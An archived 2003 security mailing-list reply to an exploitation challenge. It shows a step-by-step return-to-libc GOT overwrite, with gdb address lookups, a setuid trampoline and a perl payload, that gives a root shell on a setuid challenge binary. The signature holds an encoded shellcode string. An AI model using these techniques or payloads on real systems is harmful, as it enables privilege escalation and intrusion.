On Sat, 24 May 2003 13:11:13 +0200 spacewalker <spacewalkerat_private> wrote: > 0wn3d. Ret into libc exploitation, no setuid() stuff, quite simple in > fact. > > The challenge would have been interesting if the fopen() wasn't "a" but > create and write from beginning. > > $ ./exploit > Using system address 0x4005f531 > And overwriting printf got at 0x0804971c starting by 0x08049713 > sh-2.05b$ exit > exit > Segmentation fault > > default offset is 5 (could vary). > spacewalker > /* Say NO to target[n] exploits ! */ > I agree about using ret2libc... this one was easy enough you shouldn't have used shellcode.. =) however... you forget that system() executes through /bin/sh which will drop privs. Try making the vuln program suidroot and then run your exploit... still no root shell. =/ close.. but it really doesn't give you much more since you already had a basic user shell before you executed the sploit.. Here's one way to do it using ret2libc to avoid the privilege dropping.. (same as the encrypted post earlier, plaintext now since the cat's outta the bag anyways).. There's also a way to do with without building a trampoline prog to bounce off of.. just chaining libc calls... If no one else posts a solution doing it, I'll do it an post it later... matrix@overdose vuln-dev $ gcc -o vuln2 vulndev2.c matrix@overdose vuln-dev $ sudo chown root.root vuln2 matrix@overdose vuln-dev $ sudo chmod +s vuln2 matrix@overdose vuln-dev $ echo 'main(){sleep();execl();}' > e.c;gcc -o e.x e.c;gdb -q e.x; rm e.* (gdb) break main Breakpoint 1 at 0x804836e (gdb) run Starting program: /home/matrix/research/vuln-dev/e.x Breakpoint 1, 0x0804836e in main () (gdb) p sleep $1 = {<text variable, no debug info>} 0x400ce760 <sleep> (gdb) p execl $2 = {<text variable, no debug info>} 0x400cecc0 <execl> (gdb) quit The program is running. Exit anyway? (y or n) y matrix@overdose vuln-dev $ objdump -R vuln2 | grep exit 0804974c R_386_JUMP_SLOT exit matrix@overdose vuln-dev $ echo 'main(){setuid(0);setgid(0);execl("/bin/sh","/bin/sh",0);}' > t.c;gcc -o t.ramp t.c; matrix@overdose vuln-dev $ pwd /home/matrix/research/vuln-dev matrix@overdose vuln-dev $ printf "\x60\xe7\x0c\x40/home/matrix/research/vuln-dev/t.ramp\x00" > db.log matrix@overdose vuln-dev $ ./vuln2 `perl -e 'print "\x4c\x97\x04\x08"x31 . "\xc0\xec\x0c\x40" . "\x50\x97\x04\x08"x3;'` h `ç @/home/matrix/research/vuln-dev/t.ramp root@overdose vuln-dev # id uid=0(root) gid=0(root) groups=100(users),10(wheel),18(audio),250(portage) root@overdose vuln-dev # -- %JOSE_RONNICK%50,:-dddd-0EEb-pVVyP\-1111-jjjj-yNNN-_4HUP-qq0q-02%r-_Z%JP-%Iwp-5kyyP-n5nn-aTTa-1271P-4ttt-/888-3tSMP-bbnb-L8wL-kMwgP-3Hy3-rqzWP-m%m8-h4x--v%r5P-S7S7-g7g7-F2u2PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP
This archive was generated by hypermail 2b30 : Sat May 24 2003 - 20:37:37 PDT